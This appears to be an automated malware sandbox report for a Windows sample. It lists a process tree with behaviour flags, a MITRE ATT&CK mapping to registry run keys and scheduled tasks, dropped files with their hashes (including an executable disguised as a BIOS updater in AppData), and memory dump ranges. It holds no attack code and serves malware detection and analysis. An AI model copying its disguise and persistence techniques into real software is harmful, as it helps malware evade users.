C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3068 -s 8762⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\mobsync.exeC:\Windows\System32\mobsync.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4608 -s 6922⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fde4955918ebc1ad4a2bc41b3fc25f6240ea1c_41822faa_cab_0530cfce\WERCF82.tmp.appcompat.txtFilesize
6KB
MD5f46275f9c0b7d57378a712b3b5213b0c
SHA1deabdaf020ce95f5f0edec43711719873975b44a
SHA256523bbacd7e59ce4231693d2e486f2c2f551265328c7c8f2b178d3c5a7d2a20ae
SHA5129747d174735fcbbfa8e1957f9b0760db7ffeb563b27e565db4fe54ad74bb83409b3ba5adce5a022fbe0a5b7d17b8ddc9eed231117fd6316e675082e354e7cf54
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CEA.tmp.csvFilesize
33KB
MD59c75db299b853495eabdcd3ce5e3756b
SHA110589fbd1a4d609eae70c7c5071219160abb31a4
SHA256a3b40d44b060765e51dab197a77686f17cf7b725f2a913d9181e0e08704cfa63
SHA512dce6ee84c7c453b7b7e9767030ad879823e5faf7b520d8b7bd089535ac5231d586de4c2744b40e7da5c66cce23daedd53c6be6dd5f8c762d339242ad5563c08c
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D1A.tmp.txtFilesize
12KB
MD5e7b17f2eb546d8a4f8f01c7bf5234235
SHA18995be08dc757b5069bbfd6e65219dfa43f054f7
SHA256cc1081b88a43c8b0f600826902dd6fd397e1f912f1e2601374311be8b3c4eeaa
SHA51232bbd9c487d066bc0b67f71db4fd1fbf2556e1cfc6fdfa9d86ffd21697f7d127aeac6e605da9fdc6d53cd9a0deeaf314e0d35c22df8b8a05dcc5b55cf2e49721
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exeFilesize
409KB
MD5ed68b64af85a06a4d3edfb0eedbd5a00
SHA1668dbc4990b0a1cdd2f0c254f41b539e9b69afc1
SHA256347776cb31b6dfbb5a5cbb39e617b3913b8af8a0a826468b7e0df3b4738fc184
SHA5127555b7ff4534f0549f35f14b47f8a75509801e4c87e3740aaae20cf6c291b1e17e8a4f833e05d73e2a39471e93a63b75d5513e999850a840ac58a38d656990be
-
C:\Windows\Temp\__PSScriptPolicyTest_44diafa0.frs.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/64-117-0x0000028E45CC0000-0x0000028E45CEB000-memory.dmpFilesize
172KB
-
memory/304-121-0x0000013D735B0000-0x0000013D735DB000-memory.dmpFilesize
172KB
-
memory/508-783-0x00000000058E0000-0x00000000058FC000-memory.dmpFilesize
112KB
-
memory/508-13-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB
-
memory/508-14-0x00000000054E0000-0x00000000054F0000-memory.dmpFilesize
64KB
-
memory/508-16-0x00000000068C0000-0x00000000068CA000-memory.dmpFilesize
40KB
-
memory/508-812-0x0000000077412000-0x0000000077413000-memory.dmpFilesize
4KB
-
memory/508-86-0x00000000054E0000-0x00000000054F0000-memory.dmpFilesize
64KB
-
memory/508-76-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB
-
memory/584-71-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-70-0x0000022D64A80000-0x0000022D64AA5000-memory.dmpFilesize
148KB
-
memory/584-106-0x00007FFFC8505000-0x00007FFFC8506000-memory.dmpFilesize
4KB
-
memory/584-105-0x00007FFF884F0000-0x00007FFF88500000-memory.dmpFilesize
64KB
-
memory/584-100-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-75-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/636-127-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmpFilesize
172KB
-
memory/636-84-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmpFilesize
172KB
-
memory/728-102-0x0000029A1F940000-0x0000029A1F96B000-memory.dmpFilesize
172KB
-
memory/908-124-0x000001FAEE580000-0x000001FAEE5AB000-memory.dmpFilesize
172KB
-
memory/1004-103-0x0000028C31FC0000-0x0000028C31FEB000-memory.dmpFilesize
172KB
-
memory/3520-27-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmpFilesize
9.9MB
-
memory/3520-83-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmpFilesize
9.9MB
-
memory/3520-30-0x00000201F1CC0000-0x00000201F1CE2000-memory.dmpFilesize
136KB
-
memory/3520-33-0x00000201F1E80000-0x00000201F1EF6000-memory.dmpFilesize
472KB
-
memory/3520-29-0x00000201F1D70000-0x00000201F1D80000-memory.dmpFilesize
64KB
-
memory/3520-45-0x00000201F1D70000-0x00000201F1D80000-memory.dmpFilesize
64KB
-
memory/3520-52-0x00000201F1D30000-0x00000201F1D5A000-memory.dmpFilesize
168KB
-
memory/3520-53-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/3520-73-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/3520-54-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/3520-28-0x00000201F1D70000-0x00000201F1D80000-memory.dmpFilesize
64KB
-
memory/3520-74-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/4184-98-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4184-61-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-55-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-56-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-59-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-62-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4184-57-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-67-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-64-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/4484-959-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-901-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-960-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-897-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-903-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-899-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-893-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-892-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-895-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4924-22-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB
-
memory/4924-4-0x0000000005200000-0x0000000005210000-memory.dmpFilesize
64KB
-
memory/4924-5-0x0000000005210000-0x0000000005276000-memory.dmpFilesize
408KB
-
memory/4924-6-0x0000000005D30000-0x0000000005D42000-memory.dmpFilesize
72KB
-
memory/4924-3-0x0000000005150000-0x00000000051E2000-memory.dmpFilesize
584KB
-
memory/4924-7-0x0000000006120000-0x000000000615E000-memory.dmpFilesize
248KB
-
memory/4924-0-0x00000000007F0000-0x000000000085C000-memory.dmpFilesize
432KB
-
memory/4924-2-0x00000000055B0000-0x0000000005AAE000-memory.dmpFilesize
5.0MB
-
memory/4924-1-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB